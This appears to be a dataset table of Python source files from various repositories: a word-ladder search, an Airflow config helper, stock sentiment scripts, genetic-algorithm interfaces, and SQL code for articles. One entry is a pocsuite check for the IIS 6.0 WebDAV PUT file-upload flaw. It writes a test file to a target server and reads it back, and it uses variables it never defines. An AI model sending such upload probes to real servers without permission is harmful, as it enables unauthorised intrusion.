max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
anav.py
|
philippechataignon/anav
| 0 |
2172197
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import string
import random
from itertools import chain
import networkx as nx
import pickle
import Levenshtein
letters = list(string.ascii_lowercase)
def out(G):
for n in sorted(G) :
print(n, G.nodes[n])
def leven(word1,word2):
"""Calcul de la distance de Levenshtein entre 2 mots"""
#word1 = tri(word1)
#word2 = tri(word2)
return Levenshtein.distance(word1, word2)
def tri(s) :
""" Renvoit le mot trié pour repérage anagramme """
return "".join(sorted(list(s)))
def cree_anag(infile, outfile):
"""constitue dictionnaire des anagrammes depuis dico
Le dictionnaire renvoyé est de la forme :
* clé : "mot" constitué des lettres triés
* valeur : liste des mots anagrammes
Exemple : 'aimnos': ['aimons', 'amnios', 'maison']
"""
print('Début lecture')
with open(infile) as f:
anag = {}
for l in f:
l = l.strip()
tll = tri(l)
if tll not in anag:
anag[tll] = [l]
else:
anag[tll].append(l)
print('Fin lecture')
with open(outfile, "wb") as f:
pickle.dump(anag, f)
return anag
def lis_anag(infile):
print('Début lecture')
with open(infile, 'rb') as f:
anag = pickle.load(f)
print('Fin lecture')
return anag
def mots_from(mot):
"""renvoie la liste des mots relié à mot"""
ch = tri(mot)
s = set()
for le in letters :
s.add(tri(ch + le)) # ajoute
for i, l in enumerate(ch) :
base = ch[:i] + ch[i+1:] # enlève lettre
s.add(base) # enlève lettre
for le in letters :
s.add(tri(base + le)) # substitue
return chain(*(anag.get(ch, []) for ch in s))
def expand(G, curr, cible, atteint=True, explore=False):
"""Etend le graphe depuis curr
Le node curr passe à l'état explore à True
On récupère ses voisins et on les ajoute au graphe
à l'état explore à False
"""
dist_curr = leven(cible, curr)
G.add_node(curr, explore=True, dist=dist_curr, atteint=atteint)
for u in mots_from(curr):
if u not in G:
dist = leven(cible, u)
G.add_node(u, explore=explore, dist=dist, atteint=atteint)
else :
G.nodes[u]['atteint'] = atteint
G.add_edge(curr, u)
def analyse(G, fin, opti):
""" Analyse du graphe
Teste si on a une solution
Définit les noeuds à explorer
Lance leur exploration
"""
# Limite recherches
# On cherche le min des dist + opti
min_dist = None
if opti >= 0 :
min_dist = min([G.nodes[n]['dist'] for n in G if G.nodes[n]['atteint']])
# les nodes trop lointains sont considérés comme déjà explorés
for n in G:
if G.nodes[n]['dist'] > min_dist + opti :
G.nodes[n]['explore'] = True
# constition de la liste des nodes non explorés, donc à explorer
nodes = [n for n in G if not G.nodes[n]['explore']]
print('Analyse : ', len(nodes), 'nouveaux nodes à explorer - Distance mini :', min_dist)
for node in nodes :
expand(G, node, fin)
def cherche(G, debut, fin, max_loop=20, opti=-1):
""" Boucle principale
* explore le premier node (debut)
* puis lance l'analyse des différents niveaux (maximum max_loop)
* et vérifie si on a trouvé une solution
"""
# on génère un morceau de graphe par la fin
expand(G, fin, fin, atteint=False, explore=True)
nodes = list(G.nodes())
for n in nodes:
expand(G, n, fin, atteint=False, explore=True)
# on génère le début du graphe
expand(G, debut, fin)
flag = False
# puis on élargit progressivement l'analyse et la constitution du graphe
for level in range(max_loop):
analyse(G, fin, opti)
# s'il y a un chemin, on sort
if nx.has_path(G, debut, fin):
flag = True
break
# indique les différents chemins
if flag :
print('100 solutions au hasard :')
sol = list(nx.all_shortest_paths(G,source=debut,target=fin))
random.shuffle(sol)
for i, p in enumerate(sol):
if i < 100:
print(p)
print('Nombre total de solutions :', i+1)
else:
print("Pas de chemin trouvé")
if __name__ == '__main__':
#anag = cree_anag("lmots.txt", "lmots.pickle")
anag = lis_anag("lmots.pickle")
G = nx.Graph()
####cherche(G, 'toiture', 'abricot', opti=2)
## cherche(G, 'pipo', 'squelette', opti=2)
## cherche(G, 'stylo', 'zoulou', opti=2)
# cherche(G, 'ire', 'hydrotherapique', max_loop=30, opti=4)
cherche(G, 'vent', 'moulin', opti=2)
| 4,765 |
airflow/utils/configuration.py
|
mr-mcox/incubator-airflow
| 0 |
2172652
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from __future__ import absolute_import
import os
import json
from tempfile import mkstemp
from airflow import configuration as conf
COPY_SECTIONS = [
'core', 'smtp', 'scheduler', 'celery', 'webserver', 'hive'
]
def tmp_configuration_copy():
"""
Returns a path for a temporary file including a full copy of the configuration
settings.
:return: a path to a temporary file
"""
cfg_dict = conf.as_dict(display_sensitive=True)
temp_fd, cfg_path = mkstemp()
cfg_subset = dict()
for section in COPY_SECTIONS:
cfg_subset[section] = cfg_dict.get(section, {})
with os.fdopen(temp_fd, 'w') as temp_file:
json.dump(cfg_subset, temp_file)
return cfg_path
| 1,568 |
vul/15-WebDav-getshell.py
|
zx273983653/vulscan
| 582 |
2172895
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class IiswebdavPOC(POCBase):
vulID = '15' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2017-07-11' #漏洞公开的时间,不知道就写今天
author = 'w<EMAIL>@YSRC' # PoC作者的大名
createDate = '2017-07-11'# 编写 PoC 的日期
updateDate = '2017-07-11'# PoC 更新的时间,默认和编写时间一样
references = 'http://www.cnblogs.com/cnhacker/p/6999102.html'# 漏洞地址来源,0day不用写
name = 'iis webdav PUT getshell'# PoC 名称
appPowerLink = 'https://www.iis.net/'# 漏洞厂商主页地址
appName = 'iis'# 漏洞应用名称
appVersion = 'iis 6.0'# 漏洞影响版本
vulType = 'file-upload'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
iis6.0 PUT写文件漏洞
''' # 漏洞简要描述
samples = []# 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
#验证漏洞 pocsuite -r 15-WebDav-getshell.py -u 1.1.1.1 --verify
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
import socket
import time
import urllib2
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:80\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % vul_url
s.send(flag)
time.sleep(1)
data = s.recv(1024)
s.close()
if 'PUT' in data:
url = vul_url + '/vultest.txt'
request = urllib2.Request(url)
res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
if 'xxscan0' in res_html:
print u"iis webdav漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = flag
else:
#print u'\n【不存在漏洞】 ' + url
pass
except:
# return url
pass
print '[+]15 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(IiswebdavPOC)
| 2,839 |
dash/categories/migrations/0006_auto_20141008_1955.py
|
unicefindia/dash
| 0 |
2173044
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('categories', '0005_auto_20140922_1514'),
]
operations = [
migrations.AlterField(
model_name='category',
name='org',
field=models.ForeignKey(related_name='categories', to='orgs.Org', help_text='The organization this category applies to'),
),
]
| 487 |
predictor/diff-natural.py
|
bromjiri/Presto
| 0 |
2172936
|
import settings
import pandas as pd
import numpy as np
import datetime
import os
class Stock:
def __init__(self, subject):
input_file = settings.PREDICTOR_STOCK + "/" + subject + ".csv"
self.stock_df = pd.read_csv(input_file, sep=',', index_col='Date')
def get_diff(self, from_date, to_date):
return self.stock_df['Diff'].loc[from_date:to_date]
class Sent:
def __init__(self, subject, source):
input_file = settings.PREDICTOR_SENTIMENT + "/" + source + "/" + source + "-sent-" + subject + ".csv"
self.sent_df = pd.read_csv(input_file, sep=',', index_col='Date')
def create_diff(self, precision, stock_dates):
sentiment_col = "Sent" + precision
total_col = "Tot" + precision
diff_df = pd.DataFrame(index=stock_dates, columns=['Natural1', 'Natural2', 'Natural3'])
diff_df.index.name = "Date"
for i in range(1,4):
col = "Natural" + str(i)
temp_df = pd.DataFrame(index=stock_dates, columns=['Natural'])
temp_df['Total'] = self.sent_df[total_col]
sunday_df = np.round(self.sent_df[sentiment_col].to_frame().diff(), 2)
april26 = sunday_df[sentiment_col].loc['2017-04-26']
april27 = sunday_df[sentiment_col].loc['2017-04-27']
april28 = sunday_df[sentiment_col].loc['2017-04-28']
# shift up
sunday_df[sentiment_col] = sunday_df[sentiment_col].shift(i)
# merge
temp_df['Natural'] = sunday_df[sentiment_col].loc[stock_dates]
# shift down
temp_df['Natural'] = temp_df['Natural'].shift(-i)
diff_df[col] = temp_df.apply(func, args=('Natural',), axis=1)
diff_df.set_value('2017-04-26', col, april26)
diff_df.set_value('2017-04-27', col, april27)
diff_df.set_value('2017-04-28', col, april28)
return diff_df
def func(row, col):
if row['Total'] >= 10:
return row[col]
else:
return 0
def run_one(subject, from_date, to_date, precision):
# stock dataframe
stock = Stock(subject)
stock_df = stock.get_diff(from_date, to_date)
# print(stock_df)
# sentiment dataframe
sent = Sent(subject, source)
diff_df = sent.create_diff(precision, stock_df.index.values)
# print(diff_df)
# combine
diff_df['Stock'] = stock_df
# print(diff_df)
# save output
output_file_path = settings.PREDICTOR_DIFF + '/' + source + '/' + subject + '/' + source + '-diff-' + subject + '-' + precision + '-nat.csv'
dir = os.path.dirname(os.path.realpath(output_file_path))
os.makedirs(dir, exist_ok=True)
diff_df.to_csv(output_file_path)
def run_the(subject, from_date, to_date, precision):
stock = Stock('djia')
stock_df = stock.get_diff(from_date, to_date)
# sentiment dataframe
sent = Sent(subject, source)
diff_df = sent.create_diff(precision, stock_df.index.values)
indexes = ['djia', 'nasdaq', 'snp']
for index in indexes:
# stock dataframe
stock = Stock(index)
stock_df = stock.get_diff(from_date, to_date)
# combine
diff_df[index] = stock_df
# save output
output_file_path = settings.PREDICTOR_DIFF + '/' + source + '/' + subject + '/' + source + '-diff-' + subject + '-' + precision + '-nat.csv'
dir = os.path.dirname(os.path.realpath(output_file_path))
os.makedirs(dir, exist_ok=True)
diff_df.to_csv(output_file_path)
from_date = '2016-11-01'
to_date = '2017-04-30'
source = "stwits"
subjects = ["djia", "nasdaq", "snp"]
# subjects = ["tesla"]
precisions = ["0.6", "0.8", "1.0"]
# precisions = ["0.6"]
for precision in precisions:
for subject in subjects:
print(subject, precision)
run_one(subject, from_date, to_date, precision)
# run_the('the', from_date, to_date, precision)
| 3,885 |
hamper/plugins/__init__.py
|
ecnahc515/hamper
| 2 |
2173053
|
# This allows twisted.plugin to autodiscover plugins in this module.
# See: https://twistedmatrix.com/documents/12.2.0/core/howto/plugin.html
from twisted.plugin import pluginPackagePaths
__path__.extend(pluginPackagePaths(__name__))
__all__ = []
| 247 |
models/drawable.py
|
HumbleCatcher/A-Simplified-Simulation-of-Evolution
| 0 |
2170104
|
from abc import ABC
from structs.color import Color
from structs.point import Point
class Drawable(ABC):
def __init__(self, position: Point, radius, color: Color):
self.position = position
self.last_position = position
self.last_drawn_position = position
self.radius = radius
self.color = color
self.canvas_id = None
| 386 |
project_ws/src/project_pkg/src/sheet_music/template_matching.py
|
MatthewTurney/SheetMusicRecognition
| 0 |
2172671
|
import cv2 as cv
import imutils
import numpy as np
import MTM
def calc_boxes(template, threshold, img):
try:
hits = MTM.matchTemplates([("staff", template)], img, method=cv.TM_CCOEFF_NORMED,
N_object=float("inf"), score_threshold=threshold, maxOverlap=0.2, searchBox=None)
return hits["BBox"]
except KeyError as ke:
print(str(ke))
return []
def remove_template_matches(img, template, threshold):
matches = []
for x, y, w, h in calc_boxes(template, threshold, img):
cv.rectangle(img, (x,y), (x+w, y+h), (0, 0, 0), cv.FILLED)
matches.append((x + (w//2), y + (h//2)))
return img, matches
def remove_template_matches_with_buffer(img, template, threshold, b):
matches = []
for x, y, w, h in calc_boxes(template, threshold, img):
cv.rectangle(img, (x+b,y), (x+w-b, y+h), (0, 0, 0), cv.FILLED)
matches.append((x + (w//2), y + (h//2)))
return img, matches
| 959 |
app/crud/article.py
|
schmiedeone/audit-app-backend
| 0 |
2173106
|
from typing import List, Optional
from asyncpg import Connection
from slugify import slugify
from app.models.article import (
ArticleFilterParams,
ArticleInCreate,
ArticleInDB,
ArticleInUpdate,
)
from .profile import get_profile_for_user
from .tag import (
create_tags_that_not_exist,
get_tags_for_article,
link_tags_with_article,
)
async def is_article_favorited_by_user(
conn: Connection, slug: str, username: str
) -> bool:
return await conn.fetchval(
"""
SELECT CASE WHEN user_id IS NULL THEN FALSE ELSE TRUE END AS favorited
FROM favorites
WHERE
user_id = (SELECT id FROM users WHERE username = $1)
AND
article_id = (SELECT id FROM articles WHERE slug = $2)
""",
username,
slug,
)
async def add_article_to_favorites(conn: Connection, slug: str, username: str):
await conn.execute(
"""
INSERT INTO favorites (user_id, article_id)
VALUES (
(SELECT id FROM users WHERE username = $2),
(SELECT id FROM articles WHERE slug = $1)
)
""",
slug,
username,
)
async def remove_article_from_favorites(conn: Connection, slug: str, username: str):
await conn.execute(
"""
DELETE FROM favorites
WHERE
article_id = (SELECT id FROM articles WHERE slug = $1)
AND
user_id = (SELECT id FROM users WHERE username = $2)
""",
slug,
username,
)
async def get_favorites_count_for_article(conn: Connection, slug: str):
return await conn.fetchval(
"""
SELECT count(*) as favorites_count
FROM favorites
WHERE article_id = (SELECT id FROM articles WHERE slug = $1)
""",
slug,
)
async def get_article_by_slug(
conn: Connection, slug: str, username: Optional[str] = None
) -> ArticleInDB:
article_info_row = await conn.fetchrow(
"""
SELECT id, slug, title, description, body, created_at, updated_at,
(SELECT username FROM users WHERE id = author_id) AS author_username
FROM articles
WHERE slug = $1
""",
slug,
)
if article_info_row:
author = await get_profile_for_user(
conn, article_info_row["author_username"], username
)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
return ArticleInDB(
**article_info_row,
author=author,
tag_list=[tag.tag for tag in tags],
favorited=favorited_by_user,
favorites_count=favorites_count,
)
async def create_article_by_slug(
conn: Connection, article: ArticleInCreate, username: str
) -> ArticleInDB:
slug = slugify(article.title)
row = await conn.fetchrow(
"""
INSERT INTO articles (slug, title, description, body, author_id)
VALUES ($1, $2, $3, $4, (SELECT id FROM users WHERE username = $5))
RETURNING
id,
slug,
title,
description,
body,
(SELECT username FROM users WHERE id = author_id) as author_username,
created_at,
updated_at
""",
slug,
article.title,
article.description,
article.body,
username,
)
author = await get_profile_for_user(conn, row["author_username"], "")
if article.tag_list:
await create_tags_that_not_exist(conn, article.tag_list)
await link_tags_with_article(conn, slug, article.tag_list)
return ArticleInDB(
**row,
author=author,
tag_list=article.tag_list,
favorites_count=1,
favorited=True,
)
async def update_article_by_slug(
conn: Connection, slug: str, article: ArticleInUpdate, username: str
) -> ArticleInDB:
dbarticle = await get_article_by_slug(conn, slug, username)
if article.title:
dbarticle.slug = slugify(article.title)
dbarticle.title = article.title
dbarticle.body = article.body if article.body else dbarticle.body
dbarticle.description = (
article.description if article.description else dbarticle.description
)
row = await conn.fetchrow(
"""
UPDATE articles
SET slug = $1, title = $2, body = $3, description = $4
WHERE slug = $5 AND author_id = (SELECT id FROM users WHERE username = $6)
RETURNING updated_at
""",
dbarticle.slug,
dbarticle.title,
dbarticle.body,
dbarticle.description,
slug,
username,
)
dbarticle.updated_at = row["updated_at"]
return dbarticle
async def delete_article_by_slug(conn: Connection, slug: str, username: str):
await conn.execute(
"""
DELETE FROM articles
WHERE slug = $1 AND author_id = (SELECT id FROM users WHERE username = $2)
""",
slug,
username,
)
async def get_user_articles(
conn: Connection, username: str, limit=20, offset=0
) -> List[ArticleInDB]:
articles: List[ArticleInDB] = []
rows = await conn.fetch(
"""
SELECT a.id, a.slug, a.title, a.description, a.body, a.created_at, a.updated_at,
(SELECT username FROM users WHERE id = author_id) AS author_username
FROM articles a
INNER JOIN favorites f on a.id = f.article_id AND user_id = (SELECT id FROM users WHERE username = $1)
ORDER BY a.created_at
LIMIT $2
OFFSET $3
""",
username,
limit,
offset,
)
for row in rows:
slug = row["slug"]
author = await get_profile_for_user(conn, row["author_username"], username)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
articles.append(
ArticleInDB(
**row,
author=author,
tagList=[tag.tag for tag in tags],
favorites_count=favorites_count,
favorited=favorited_by_user,
)
)
return articles
async def get_articles_with_filters(
conn: Connection, filters: ArticleFilterParams, username: Optional[str] = None
) -> List[ArticleInDB]:
articles: List[ArticleInDB] = []
query_params_count = 0
base_query = """
SELECT
a.id,
a.slug,
a.title,
a.description,
a.body,
a.created_at,
a.updated_at,
(SELECT username FROM users WHERE id = a.author_id) AS author_username
FROM articles a
"""
if filters.tag:
query_params_count += 1
base_query += f"""
INNER JOIN article_tags at ON
a.id = at.article_id
AND
at.tag_id = (SELECT id FROM tags WHERE tag = ${query_params_count})
"""
if filters.favorited:
query_params_count += 1
base_query += f"""
INNER JOIN favorites fav ON
a.id = fav.article_id
AND
fav.user_id = (SELECT id FROM users WHERE username = ${query_params_count})
"""
if filters.author:
query_params_count += 1
base_query += f"""
LEFT OUTER JOIN users u ON
a.author_id = u.id
AND
u.id = (SELECT id FROM users WHERE u.username = ${query_params_count})
"""
base_query += f"""
LIMIT ${query_params_count + 1}
OFFSET ${query_params_count + 2}
"""
params = [
param
for param in [
filters.tag or None,
filters.favorited or None,
filters.author or None,
filters.limit,
filters.offset,
]
if param is not None
]
rows = await conn.fetch(base_query, *params)
for row in rows:
slug = row["slug"]
author = await get_profile_for_user(conn, row["author_username"], username)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
articles.append(
ArticleInDB(
**row,
author=author,
tag_list=[tag.tag for tag in tags],
favorites_count=favorites_count,
favorited=favorited_by_user,
)
)
return articles
| 8,845 |
Step04_Identify_new_targets/filterFinalRescue.py
|
talkowski-lab/SMC_CNN_Model
| 1 |
2173063
|
#!/usr/bin/env python
from __future__ import division
import numpy.random as npr
import shlex, subprocess
import commands
def extract_info(a):
al=a.split("ALLELEID=")[1].split(";")[0]
if "CLNDN=" in a:
ds=a.split("CLNDN=")[1].split(";")[0]
else:
ds=a.split("CLNDNINCL=")[1].split(";")[0]
if "CLNDISDB=" in a:
db=a.split("CLNDISDB=")[1].split(";")[0]
else:
db=a.split("CLNDISDBINCL=")[1].split(";")[0]
if "CLNSIG=" in a:
patho=a.split("CLNSIG=")[1].split(";")[0]
else:
patho=a.split("CLNSIGINCL=")[1].split(";")[0]
if "MC=" in a:
mc=a.split("MC=")[1].split(";")[0]
else:
mc="NA"
return [patho,mc,al,ds,db]
def pub(var_citations):
liter={}
with open(var_citations,"r") as f:
d=f.readlines()
for x in d[1:]:
t=x.strip().split("\t")
pid=t[-1]
src=t[-2]
ids=t[1]
if src=="PubMed":
if (ids in liter)==False:
liter[ids]=[pid,1]
else:
liter[ids][0]+=","+pid
liter[ids][1]+=1
return liter
def cp(sad_inp):
pp={}
with open(sad_inp,"r") as ff:
dd=ff.readlines()
for rec in dd:
tt=rec.strip().split("\t")
if ((tt[2],tt[5]) in pp) == False:
pp[(tt[2],tt[5])]=[tt[-3],tt[-2],tt[-1]]
else:
print "Error: Record duplication"
return pp
def incl_filter(a,piece,c0,c1,c2):
outSAD=a[:-4]+"_inclusion.txt"
dicM=pub("../Input_data/var_citations_20190325.txt")
dicP=cp("../Output_data/clinvar_20190325_SNV_INDEL1000_mainChr_headerLength_spliceAIpredicted_ds02_pathogenic_junctions_mEX_4BassetSad.vcf")
with open(a,"r") as f:
d=f.readlines()
f2=open(outSAD,"w")
f2.write(d[0].strip()+"\tPathogenic\tMC\tAlleleID\tDisease\tDisease_DB\tNum_paper\tPubMedID\n")
i=1
while i<len(d):
hit=0
cid,tid,dis,ref,mut,target0,pred_ref0,pred_mut0,chg0=d[i].strip().split("\t")
cid,tid,dis,ref,mut,target1,pred_ref1,pred_mut1,chg1=d[i+1].strip().split("\t")
cid,tid,dis,ref,mut,target2,pred_ref2,pred_mut2,chg2=d[i+2].strip().split("\t")
if (float(pred_mut0)>=c0 and float(pred_mut0)>float(pred_mut1) and float(pred_mut0)>float(pred_mut2)):
hit+=1
if "seqDiff" in dis:
hit+=1
if ("mEXdrop3" in dis) and ("nonsense" in dis)==False and ("frameshift" in dis)==False and ("junctGone" in dis)==False:
hit+=1
if cid in dicM:
hit+=1
if hit ==4:
info=extract_info(dicP[(cid,tid)][0])
f2.write(d[i].strip()+"\t"+"\t".join(info)+"\t"+dicM[cid][0]+"\t"+str(dicM[cid][1])+"\n")
i+=3
f2.close()
return 1
def excl_filter(a,piece,c0,c1,c2):
outSAD=a[:-4]+"_exclusion.txt"
dicM=pub("../Input_data/var_citations_20190325.txt")
dicP=cp("../Output_data/clinvar_20190325_SNV_INDEL1000_mainChr_headerLength_spliceAIpredicted_ds02_pathogenic_junctions_mEX_4BassetSad.vcf")
with open(a,"r") as f:
d=f.readlines()
f2=open(outSAD,"w")
f2.write(d[0].strip()+"\tPathogenic\tMC\tAlleleID\tDisease\tDisease_DB\tNum_paper\tPubMedID\n")
i=1
while i<len(d):
hit=0
cid,tid,dis,ref,mut,target0,pred_ref0,pred_mut0,chg0=d[i].strip().split("\t")
cid,tid,dis,ref,mut,target1,pred_ref1,pred_mut1,chg1=d[i+1].strip().split("\t")
cid,tid,dis,ref,mut,target2,pred_ref2,pred_mut2,chg2=d[i+2].strip().split("\t")
seq0=dicP[(cid,tid)][-2]
seq1=dicP[(cid,tid)][-1]
start =int(tid.split("@")[2].split("^")[1].split("&")[0])
end =int(tid.split("@")[2].split("&")[1].split("^")[0])-1
if (float(pred_mut0)<float(pred_mut1) and float(pred_mut1)>=c1 and float(pred_mut2)<float(pred_mut1)):
hit+=1
if "seqDiff" in dis:
hit+=1
if (("mEXmore" in dis) and ("nonsense" in dis)==False and ("frameshift" in dis)==False and ("junctGone" in dis)==False) or (((end-start)%3)==0 and ("nonsense_mEX" in dis)):
hit+=1
if cid in dicM:
hit+=1
if hit ==4:
info=extract_info(dicP[(cid,tid)][0])
f2.write(d[i+1].strip()+"\t"+"\t".join(info)+"\t"+dicM[cid][0]+"\t"+str(dicM[cid][1])+"\n")
i+=3
f2.close()
return 1
def doit(inp,region,cut0,cut1,cut2):
incl_filter(inp,region,cut0,cut1,cut2)
excl_filter(inp,region,cut0,cut1,cut2)
return 1
doit("../Output_data/sad_table.txt",
4,
0.225832171738145,
0.803149670362475,
0.36993284523487)
| 4,717 |
src/ga/interfaces/island.py
|
technote-space/genetic-algorithms-py
| 3 |
2171999
|
from abc import ABCMeta, abstractmethod
from .population import IPopulation
from .fitness import IFitness
from .selection import ISelection
from .crossover import ICrossover
from .mutation import IMutation
from .reinsertion import IReinsertion
class IIsland(metaclass=ABCMeta):
"""
Description:
------------
島モデルにおける島のinterface
"""
__population: IPopulation
__fitness: IFitness
__selection: ISelection
__crossover: ICrossover
__mutation: IMutation
__reinsertion: IReinsertion
__evaluate_parents_fitness: bool
def __init__(
self,
population: IPopulation,
fitness: IFitness,
selection: ISelection,
crossover: ICrossover,
mutation: IMutation,
reinsertion: IReinsertion,
evaluate_parents_fitness: bool
):
self.__population = population
self.__fitness = fitness
self.__selection = selection
self.__crossover = crossover
self.__mutation = mutation
self.__reinsertion = reinsertion
self.__evaluate_parents_fitness = evaluate_parents_fitness
@property
def population(self) -> IPopulation:
return self.__population
@property
def fitness(self) -> IFitness:
return self.__fitness
@property
def selection(self) -> ISelection:
return self.__selection
@property
def crossover(self) -> ICrossover:
return self.__crossover
@property
def mutation(self) -> IMutation:
return self.__mutation
@property
def reinsertion(self) -> IReinsertion:
return self.__reinsertion
@property
def evaluate_parents_fitness(self) -> bool:
return self.__evaluate_parents_fitness
@property
@abstractmethod
def initialized(self) -> bool:
pass
@property
@abstractmethod
def generation_number(self) -> int:
pass
@property
@abstractmethod
def offspring_number(self) -> int:
pass
@abstractmethod
def reset(self) -> None:
pass
@abstractmethod
def step(self) -> None:
pass
| 2,123 |
src/posprocessing/bias.py
|
DiegoCorrea/masters-dissertation
| 0 |
2170644
|
from copy import deepcopy
import pandas as pd
from src.config.labels import ITEM_LABEL, TRANSACTION_VALUE_LABEL, BIAS_VALUE_LABEL
from src.config.variables import BIAS_SIGMA, BIAS_ALPHA
def calculating_item_bias(trainset_df, transaction_mean):
in_bias_trainset_df = deepcopy(trainset_df)
items_ids = in_bias_trainset_df[ITEM_LABEL].unique().tolist()
in_bias_trainset_df[TRANSACTION_VALUE_LABEL] -= transaction_mean
item_bias_df = pd.DataFrame()
for item in items_ids:
item_subset_df = in_bias_trainset_df[in_bias_trainset_df[ITEM_LABEL] == item]
up = item_subset_df[TRANSACTION_VALUE_LABEL].sum()
down = BIAS_ALPHA + len(item_subset_df)
item_bias_df = pd.concat(
[item_bias_df, pd.DataFrame(data=[[item, up / down]], columns=[ITEM_LABEL, BIAS_VALUE_LABEL])])
return item_bias_df
def calculating_user_bias(users_items, transaction_mean, bias_list, i_id):
up = users_items[i_id].score - transaction_mean - users_items[i_id].bias
bias_list.append(up)
return sum(bias_list) / (BIAS_SIGMA + len(bias_list)), bias_list
| 1,099 |
app/db.py
|
veelupu/AI-chatbot
| 0 |
2171991
|
# Copyright (c) 2021 <NAME>
from . import app
from flask_sqlalchemy import SQLAlchemy
from os import getenv
app.config["SQLALCHEMY_DATABASE_URI"] = getenv("DATABASE_URL")
db = SQLAlchemy(app)
def keywords():
sql = "SELECT word FROM aicb.question"
result = db.session.execute(sql)
keywords = result.fetchall()
db.session.commit()
keyword_set = set([
x.word
for x in keywords])
return keyword_set
def fetch_id(word):
sql = "SELECT id FROM aicb.question WHERE word=(:word)"
result = db.session.execute(sql, {"word":word})
id = result.fetchone()[0]
db.session.commit()
return id
def fetch_answers(id):
sql = """SELECT content
FROM aicb.answer a
JOIN aicb.question_answer q_a
ON q_a.a_id = a.id
WHERE q_id=(:id)"""
result = db.session.execute(sql, {"id":id})
answers = result.fetchall()
db.session.commit()
answer_list = [
x.content
for x in answers
]
return answer_list
def check_code(code):
"Returns 0 if code does not exist, 1 if code is a human code and 2 otherwise."
sql = """SELECT human
FROM aicb.code c
WHERE c.id=(:code)"""
result = db.session.execute(sql, {"code":code})
answer = result.fetchone()
db.session.commit()
if answer is None:
return 0
elif answer[0]:
return 1
else:
return 2
| 1,498 |
Sorting_nLogn_Methods/MedianOfTwoSortedArrays.py
|
dr-aheydari/Coding_Practice
| 0 |
2172558
|
"""
Given two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.
Follow up: The overall run time complexity should be O(log (m+n)).
Example 1:
Input: nums1 = [1,3], nums2 = [2]
Output: 2.00000
Explanation: merged array = [1,2,3] and median is 2.
Example 2:
Input: nums1 = [1,2], nums2 = [3,4]
Output: 2.50000
Explanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.
Example 3:
Input: nums1 = [0,0], nums2 = [0,0]
Output: 0.00000
Example 4:
Input: nums1 = [], nums2 = [1]
Output: 1.00000
Example 5:
Input: nums1 = [2], nums2 = []
Output: 2.00000
Constraints:
nums1.length == m
nums2.length == n
0 <= m <= 1000
0 <= n <= 1000
1 <= m + n <= 2000
-106 <= nums1[i], nums2[i] <= 106
"""
class Solution(object):
## using built in python's sort function :)
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
nums1.extend(nums2);
nums1.sort();
# if we have an even number of elements
middle = len(nums1)/2;
if len(nums1) % 2 == 0:
median = float(nums1[middle-1] + nums1[middle])/2.0
return median
else:
median = nums1[int(middle)]
return median
| 1,327 |
blocks/serialization.py
|
madisonmay/blocks
| 0 |
2172719
|
import numpy
import logging
from blocks.bricks import Brick
from blocks.select import Selector
logger = logging.getLogger(__name__)
def save_params(bricks, path):
"""Save bricks parameters.
Saves parameters with their pathes into an .npz file.
Parameters
----------
bricks : Brick or Selector
The bricks.
path : str of file
Destination for saving.
"""
if isinstance(bricks, Brick):
bricks = Selector([bricks])
assert isinstance(bricks, Selector)
params = bricks.get_params()
# numpy.savez is vulnerable to slashes in names
param_values = {name.replace("/", "-"): param.get_value()
for name, param in params.items()}
numpy.savez(path, **param_values)
def load_params(bricks, path):
"""Load brick parameters.
Loads parameters from .npz file where they are saved with their pathes.
